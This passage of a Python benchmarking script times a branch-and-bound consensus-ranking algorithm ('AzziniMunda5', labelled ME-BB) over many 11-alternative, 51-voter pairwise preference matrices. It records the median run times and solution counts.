[15,17,13,0,15,21,7,7,12,20,15],
[20,22,21,36,0,23,19,22,7,29,18],
[24,23,22,30,28,0,21,26,22,29,26],
[31,26,34,44,32,30,0,36,25,40,31],
[18,23,26,44,29,25,15,0,15,25,17],
[24,28,22,39,44,29,26,36,0,33,24],
[22,22,21,31,22,22,11,26,18,0,17],
[34,32,29,36,33,25,20,34,27,34,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 13, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,21,25,27,25,25,21,23,18,23],
[28,0,21,29,31,23,26,26,32,28,32],
[30,30,0,32,37,27,28,30,29,24,28],
[26,22,19,0,29,22,24,24,26,19,20],
[24,20,14,22,0,23,25,23,25,17,16],
[26,28,24,29,28,0,26,28,25,19,24],
[26,25,23,27,26,25,0,23,25,22,17],
[30,25,21,27,28,23,28,0,27,27,28],
[28,19,22,25,26,26,26,24,0,18,22],
[33,23,27,32,34,32,29,24,33,0,27],
[28,19,23,31,35,27,34,23,29,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 14, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,31,30,24,25,24,26,29,28,20,28],
[20,0,23,23,20,26,20,22,22,21,28],
[21,28,0,22,18,29,21,21,26,15,30],
[27,28,29,0,26,30,17,18,26,21,29],
[26,31,33,25,0,32,25,22,28,24,26],
[27,25,22,21,19,0,17,21,24,21,27],
[25,31,30,34,26,34,0,27,28,30,33],
[22,29,30,33,29,30,24,0,28,23,31],
[23,29,25,25,23,27,23,23,0,21,33],
[31,30,36,30,27,30,21,28,30,0,29],
[23,23,21,22,25,24,18,20,18,22,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 15, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,20,19,25,13,18,18,22,23,21],
[28,0,17,26,27,19,17,26,19,22,21],
[31,34,0,32,29,22,26,27,23,29,27],
[32,25,19,0,24,21,22,24,26,26,24],
[26,24,22,27,0,22,22,26,22,24,24],
[38,32,29,30,29,0,29,31,33,30,24],
[33,34,25,29,29,22,0,37,32,30,25],
[33,25,24,27,25,20,14,0,23,26,21],
[29,32,28,25,29,18,19,28,0,26,31],
[28,29,22,25,27,21,21,25,25,0,25],
[30,30,24,27,27,27,26,30,20,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 16, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,30,27,24,29,22,34,34,24,33,30],
[21,0,23,25,29,24,32,25,23,26,26],
[24,28,0,27,34,25,31,25,17,31,29],
[27,26,24,0,30,30,33,26,24,30,29],
[22,22,17,21,0,22,22,26,18,20,22],
[29,27,26,21,29,0,29,30,28,31,27],
[17,19,20,18,29,22,0,24,23,20,22],
[17,26,26,25,25,21,27,0,21,25,33],
[27,28,34,27,33,23,28,30,0,29,27],
[18,25,20,21,31,20,31,26,22,0,26],
[21,25,22,22,29,24,29,18,24,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 17, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,20,25,27,19,20,27,22,19,18,29],
[31,0,31,30,26,26,30,25,22,28,28],
[26,20,0,26,23,19,25,21,19,23,25],
[24,21,25,0,20,22,27,18,17,23,27],
[32,25,28,31,0,30,29,31,28,29,30],
[31,25,32,29,21,0,28,28,23,23,28],
[24,21,26,24,22,23,0,19,21,23,22],
[29,26,30,33,20,23,32,0,24,26,29],
[32,29,32,34,23,28,30,27,0,27,33],
[33,23,28,28,22,28,28,25,24,0,30],
[22,23,26,24,21,23,29,22,18,21,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 18, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,21,29,26,31,20,27,31,27,21],
[23,0,19,26,21,33,21,28,27,29,20],
[30,32,0,25,32,28,26,23,29,31,20],
[22,25,26,0,23,24,20,20,27,21,24],
[25,30,19,28,0,27,21,25,24,25,19],
[20,18,23,27,24,0,20,19,26,21,17],
[31,30,25,31,30,31,0,30,32,33,29],
[24,23,28,31,26,32,21,0,28,25,23],
[20,24,22,24,27,25,19,23,0,23,22],
[24,22,20,30,26,30,18,26,28,0,18],
[30,31,31,27,32,34,22,28,29,33,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 19, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,28,25,32,17,23,31,28,25,26],
[23,0,21,26,32,19,26,22,26,27,23],
[23,30,0,25,41,26,24,22,28,26,23],
[26,25,26,0,31,22,33,32,29,22,26],
[19,19,10,20,0,11,23,23,19,19,23],
[34,32,25,29,40,0,28,32,30,32,27],
[28,25,27,18,28,23,0,27,24,25,23],
[20,29,29,19,28,19,24,0,24,19,26],
[23,25,23,22,32,21,27,27,0,27,30],
[26,24,25,29,32,19,26,32,24,0,19],
[25,28,28,25,28,24,28,25,21,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 20, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,20,33,34,25,36,31,35,27,21,32],
[31,0,25,37,33,34,30,43,33,34,34],
[18,26,0,27,29,23,22,34,18,22,18],
[17,14,24,0,21,25,31,32,10,21,22],
[26,18,22,30,0,26,24,35,32,27,25],
[15,17,28,26,25,0,30,31,15,30,20],
[20,21,29,20,27,21,0,34,23,21,21],
[16,8,17,19,16,20,17,0,25,22,11],
[24,18,33,41,19,36,28,26,0,19,28],
[30,17,29,30,24,21,30,29,32,0,27],
[19,17,33,29,26,31,30,40,23,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 21, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,21,20,31,19,21,16,25,33,26,16],
[30,0,24,27,31,25,26,26,31,23,31],
[31,27,0,25,25,28,17,34,30,27,30],
[20,24,26,0,21,21,16,34,32,21,22],
[32,20,26,30,0,30,19,27,29,28,23],
[30,26,23,30,21,0,16,32,36,28,21],
[35,25,34,35,32,35,0,31,35,28,30],
[26,25,17,17,24,19,20,0,29,26,20],
[18,20,21,19,22,15,16,22,0,19,24],
[25,28,24,30,23,23,23,25,32,0,22],
[35,20,21,29,28,30,21,31,27,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 22, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,16,18,25,19,17,18,20,20,21],
[32,0,24,20,25,28,20,24,24,26,22],
[35,27,0,26,32,27,25,31,26,28,28],
[33,31,25,0,32,25,21,24,29,29,27],
[26,26,19,19,0,24,18,23,22,22,26],
[32,23,24,26,27,0,27,33,22,25,31],
[34,31,26,30,33,24,0,25,34,28,28],
[33,27,20,27,28,18,26,0,25,20,25],
[31,27,25,22,29,29,17,26,0,27,27],
[31,25,23,22,29,26,23,31,24,0,24],
[30,29,23,24,25,20,23,26,24,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 23, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,22,18,24,20,18,18,21,24,22],
[28,0,26,28,28,29,27,29,33,22,31],
[29,25,0,25,31,26,27,25,26,28,25],
[33,23,26,0,33,26,27,23,27,31,28],
[27,23,20,18,0,24,19,20,25,22,20],
[31,22,25,25,27,0,20,25,26,24,26],
[33,24,24,24,32,31,0,27,24,25,29],
[33,22,26,28,31,26,24,0,29,25,22],
[30,18,25,24,26,25,27,22,0,22,24],
[27,29,23,20,29,27,26,26,29,0,25],
[29,20,26,23,31,25,22,29,27,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 24, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,40,31,30,36,40,30,24,51,32,30],
[11,0,32,29,36,20,20,19,34,22,17],
[20,19,0,19,13,21,14,0,35,6,14],
[21,22,32,0,34,32,30,13,34,10,29],
[15,15,38,17,0,17,15,10,30,16,19],
[11,31,30,19,34,0,14,26,35,21,18],
[21,31,37,21,36,37,0,16,42,20,20],
[27,32,51,38,41,25,35,0,39,34,29],
[0,17,16,17,21,16,9,12,0,20,4],
[19,29,45,41,35,30,31,17,31,0,30],
[21,34,37,22,32,33,31,22,47,21,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 25, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,32,24,21,24,19,30,25,20,27],
[24,0,28,27,21,25,24,28,27,18,31],
[19,23,0,21,20,24,17,27,23,19,28],
[27,24,30,0,28,28,24,24,25,22,31],
[30,30,31,23,0,31,23,34,32,27,39],
[27,26,27,23,20,0,23,28,29,18,29],
[32,27,34,27,28,28,0,31,31,24,29],
[21,23,24,27,17,23,20,0,23,27,27],
[26,24,28,26,19,22,20,28,0,17,26],
[31,33,32,29,24,33,27,24,34,0,35],
[24,20,23,20,12,22,22,24,25,16,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 26, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,26,28,29,23,29,29,28,26,26],
[26,0,25,25,24,24,21,26,24,25,24],
[25,26,0,31,28,31,26,32,28,32,30],
[23,26,20,0,29,23,22,24,26,27,26],
[22,27,23,22,0,25,19,28,23,24,23],
[28,27,20,28,26,0,21,29,23,29,24],
[22,30,25,29,32,30,0,24,30,30,27],
[22,25,19,27,23,22,27,0,29,24,30],
[23,27,23,25,28,28,21,22,0,29,23],
[25,26,19,24,27,22,21,27,22,0,25],
[25,27,21,25,28,27,24,21,28,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 27, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,30,26,26,23,33,30,27,31,24,28],
[21,0,23,20,26,32,26,24,34,19,27],
[25,28,0,22,28,32,26,24,33,28,29],
[25,31,29,0,24,31,29,28,33,28,28],
[28,25,23,27,0,31,25,29,33,25,25],
[18,19,19,20,20,0,15,23,27,19,24],
[21,25,25,22,26,36,0,28,33,24,25],
[24,27,27,23,22,28,23,0,32,25,33],
[20,17,18,18,18,24,18,19,0,17,17],
[27,32,23,23,26,32,27,26,34,0,26],
[23,24,22,23,26,27,26,18,34,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 28, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,27,24,35,29,28,31,36,25,30],
[26,0,22,28,29,22,28,24,32,25,25],
[24,29,0,28,30,30,24,26,29,24,30],
[27,23,23,0,30,25,26,27,34,22,24],
[16,22,21,21,0,23,17,15,25,19,21],
[22,29,21,26,28,0,28,26,30,28,29],
[23,23,27,25,34,23,0,25,28,24,28],
[20,27,25,24,36,25,26,0,29,22,24],
[15,19,22,17,26,21,23,22,0,16,19],
[26,26,27,29,32,23,27,29,35,0,27],
[21,26,21,27,30,22,23,27,32,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 29, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,30,31,23,27,27,30,25,24,24,23],
[21,0,21,25,21,20,22,27,20,16,22],
[20,30,0,27,23,25,22,29,22,25,24],
[28,26,24,0,25,28,24,30,29,24,29],
[24,30,28,26,0,32,27,30,30,29,29],
[24,31,26,23,19,0,27,28,24,27,24],
[21,29,29,27,24,24,0,28,27,26,30],
[26,24,22,21,21,23,23,0,25,19,26],
[27,31,29,22,21,27,24,26,0,24,24],
[27,35,26,27,22,24,25,32,27,0,29],
[28,29,27,22,22,27,21,25,27,22,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 30, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,21,23,21,28,24,29,25,22,24,21],
[30,0,24,25,28,27,26,28,24,24,22],
[28,27,0,26,28,29,30,26,26,31,25],
[30,26,25,0,28,27,33,27,25,29,29],
[23,23,23,23,0,24,29,24,22,27,25],
[27,24,22,24,27,0,30,26,26,29,27],
[22,25,21,18,22,21,0,17,23,26,20],
[26,23,25,24,27,25,34,0,20,29,22],
[29,27,25,26,29,25,28,31,0,29,25],
[27,27,20,22,24,22,25,22,22,0,21],
[30,29,26,22,26,24,31,29,26,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 31, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,27,25,27,34,25,17,23,26,25],
[25,0,37,26,33,42,42,28,33,43,29],
[24,14,0,39,35,34,37,23,15,26,28],
[26,25,12,0,27,33,25,22,23,27,33],
[24,18,16,24,0,24,48,15,19,32,31],
[17,9,17,18,27,0,36,18,9,24,29],
[26,9,14,26,3,15,0,9,2,23,22],
[34,23,28,29,36,33,42,0,13,34,25],
[28,18,36,28,32,42,49,38,0,41,40],
[25,8,25,24,19,27,28,17,10,0,22],
[26,22,23,18,20,22,29,26,11,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 32, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,32,31,29,27,27,28,29,21,21,23],
[19,0,24,27,24,18,21,28,27,20,23],
[20,27,0,27,22,25,31,22,26,23,22],
[22,24,24,0,25,18,26,29,26,20,20],
[24,27,29,26,0,27,28,27,22,23,21],
[24,33,26,33,24,0,26,27,25,23,24],
[23,30,20,25,23,25,0,25,19,21,21],
[22,23,29,22,24,24,26,0,24,24,19],
[30,24,25,25,29,26,32,27,0,28,23],
[30,31,28,31,28,28,30,27,23,0,27],
[28,28,29,31,30,27,30,32,28,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 33, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,28,14,19,34,23,21,20,19,26],
[28,0,28,22,18,33,18,28,27,27,30],
[23,23,0,20,27,30,25,17,26,23,28],
[37,29,31,0,25,38,31,30,32,32,37],
[32,33,24,26,0,33,21,27,37,24,32],
[17,18,21,13,18,0,16,21,15,19,25],
[28,33,26,20,30,35,0,37,31,20,32],
[30,23,34,21,24,30,14,0,24,20,25],
[31,24,25,19,14,36,20,27,0,27,28],
[32,24,28,19,27,32,31,31,24,0,27],
[25,21,23,14,19,26,19,26,23,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 34, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,12,18,12,18,21,18,21,12,30,33],
[39,0,18,39,18,39,18,39,18,18,51],
[33,33,0,33,30,33,12,33,12,12,33],
[39,12,18,0,18,39,18,21,18,18,51],
[33,33,21,33,0,33,21,33,12,33,33],
[30,12,18,12,18,0,18,33,12,30,12],
[33,33,39,33,30,33,0,33,12,12,33],
[30,12,18,30,18,18,18,0,30,30,30],
[39,33,39,33,39,39,39,21,0,51,51],
[21,33,39,33,18,21,39,21,0,0,33],
[18,0,18,0,18,39,18,21,0,18,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 35, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,26,25,32,27,31,30,31,26,27],
[25,0,27,21,25,25,22,21,22,20,24],
[25,24,0,27,26,27,28,23,26,19,28],
[26,30,24,0,31,23,23,19,26,24,34],
[19,26,25,20,0,24,19,22,23,17,24],
[24,26,24,28,27,0,27,21,24,23,23],
[20,29,23,28,32,24,0,25,26,22,27],
[21,30,28,32,29,30,26,0,28,31,30],
[20,29,25,25,28,27,25,23,0,25,26],
[25,31,32,27,34,28,29,20,26,0,30],
[24,27,23,17,27,28,24,21,25,21,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 36, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,24,32,27,20,23,25,29,22,31],
[27,0,17,26,21,20,27,27,21,24,21],
[27,34,0,33,32,23,31,26,36,26,29],
[19,25,18,0,27,23,22,24,27,16,19],
[24,30,19,24,0,24,23,27,31,22,23],
[31,31,28,28,27,0,27,26,30,25,28],
[28,24,20,29,28,24,0,27,31,22,29],
[26,24,25,27,24,25,24,0,33,27,25],
[22,30,15,24,20,21,20,18,0,18,23],
[29,27,25,35,29,26,29,24,33,0,29],
[20,30,22,32,28,23,22,26,28,22,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 37, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,17,24,24,19,15,22,8,14,17],
[26,0,21,30,25,22,21,22,18,25,28],
[34,30,0,34,24,20,28,25,13,27,22],
[27,21,17,0,17,18,22,29,7,20,16],
[27,26,27,34,0,31,30,28,15,30,28],
[32,29,31,33,20,0,36,23,27,32,29],
[36,30,23,29,21,15,0,24,11,22,33],
[29,29,26,22,23,28,27,0,17,26,25],
[43,33,38,44,36,24,40,34,0,42,45],
[37,26,24,31,21,19,29,25,9,0,22],
[34,23,29,35,23,22,18,26,6,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 38, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,17,25,27,29,26,20,27,26,32,24],
[34,0,23,32,39,32,28,40,33,33,33],
[26,28,0,26,27,25,34,32,22,36,29],
[24,19,25,0,30,22,31,29,31,32,30],
[22,12,24,21,0,16,16,23,18,26,16],
[25,19,26,29,35,0,28,27,32,29,29],
[31,23,17,20,35,23,0,25,30,23,25],
[24,11,19,22,28,24,26,0,29,28,30],
[25,18,29,20,33,19,21,22,0,27,15],
[19,18,15,19,25,22,28,23,24,0,18],
[27,18,22,21,35,22,26,21,36,33,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 39, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,17,17,30,36,17,30,17,17,26,38],
[34,0,21,40,45,15,28,34,32,15,38],
[34,30,0,51,30,30,24,45,24,39,45],
[21,11,0,0,17,0,11,26,11,15,32],
[15,6,21,34,0,15,34,21,6,15,38],
[34,36,21,51,36,0,45,45,30,28,51],
[21,23,27,40,17,6,0,38,17,21,38],
[34,17,6,25,30,6,13,0,11,15,32],
[34,19,27,40,45,21,34,40,0,21,32],
[25,36,12,36,36,23,30,36,30,0,36],
[13,13,6,19,13,0,13,19,19,15,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 40, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,14,11,18,20,17,17,23,20,30],
[25,0,23,11,13,23,33,39,30,33,27],
[37,28,0,19,22,27,39,36,31,13,25],
[40,40,32,0,25,42,39,42,39,31,34],
[33,38,29,26,0,32,29,35,26,23,42],
[31,28,24,9,19,0,28,33,25,25,25],
[34,18,12,12,22,23,0,24,9,16,19],
[34,12,15,9,16,18,27,0,21,18,19],
[28,21,20,12,25,26,42,30,0,16,25],
[31,18,38,20,28,26,35,33,35,0,36],
[21,24,26,17,9,26,32,32,26,15,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 41, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,35,32,30,29,24,30,35,33,21,31],
[16,0,24,23,15,26,18,29,15,14,14],
[19,27,0,19,17,20,19,21,18,17,19],
[21,28,32,0,25,23,21,23,28,26,28],
[22,36,34,26,0,28,29,35,31,24,22],
[27,25,31,28,23,0,32,34,25,24,25],
[21,33,32,30,22,19,0,32,30,23,26],
[16,22,30,28,16,17,19,0,28,17,13],
[18,36,33,23,20,26,21,23,0,13,26],
[30,37,34,25,27,27,28,34,38,0,23],
[20,37,32,23,29,26,25,38,25,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 42, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,26,17,32,34,38,39,24,17,32],
[25,0,18,20,39,29,19,33,13,28,35],
[25,33,0,26,26,35,35,32,30,32,33],
[34,31,25,0,29,31,42,25,18,25,19],
[19,12,25,22,0,37,14,10,10,26,19],
[17,22,16,20,14,0,23,7,12,23,9],
[13,32,16,9,37,28,0,33,18,17,26],
[12,18,19,26,41,44,18,0,13,28,35],
[27,38,21,33,41,39,33,38,0,32,26],
[34,23,19,26,25,28,34,23,19,0,26],
[19,16,18,32,32,42,25,16,25,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 43, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,18,17,17,16,20,14,10,20,15,12],
[33,0,31,28,29,35,32,23,30,32,26],
